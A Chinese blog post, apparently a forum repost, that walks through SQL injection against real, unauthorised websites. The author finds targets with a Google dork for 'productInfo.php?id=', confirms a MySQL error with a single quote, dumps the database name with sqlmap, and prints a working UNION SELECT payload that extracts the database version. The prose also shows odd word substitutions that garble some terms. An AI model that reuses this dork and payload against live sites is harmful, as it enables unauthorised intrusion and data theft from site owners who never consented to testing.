一次SQL注入实战记录
一、在Google欣赏器用inurl搜索语法寻找目的inrul:productInfo.php?id=二、随便点开几个连接,目的出现了
https://img2024.cnblogs.com/blog/3222269/202404/3222269-20240407173650167-1085624762.png
给id参数加单引号',页面不正常了,在上方还出现了查询报错的相干信息,相干信息还给出了数据库是MySQL。
https://img2024.cnblogs.com/blog/3222269/202404/3222269-20240407173929438-34250920.png
三、使用sqlmap进行扫描
https://img2024.cnblogs.com/blog/3222269/202404/3222269-20240407174205116-519486849.png
颠末小小的等待,有收获了,爆出了数据库名。
https://img2024.cnblogs.com/blog/3222269/202404/3222269-20240407174946513-45736465.png
根据sqlmap的给出paylaod可以进行SQL注入,改变concat函数的参数就可以了手工使用了,如下payload可以爆出数据库版本:
-8444%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(VERSION(),0x41756942736671524472427366534f54644f42527170684356664c43775571656253554978616557,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL--%20-concat函数的三个参数都是可以回显使用的。
https://img2024.cnblogs.com/blog/3222269/202404/3222269-20240407175422733-2132103736.png
到这里SQL注入已经完成了,点到为止。
若有错误,接待指正!o( ̄▽ ̄)ブ
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]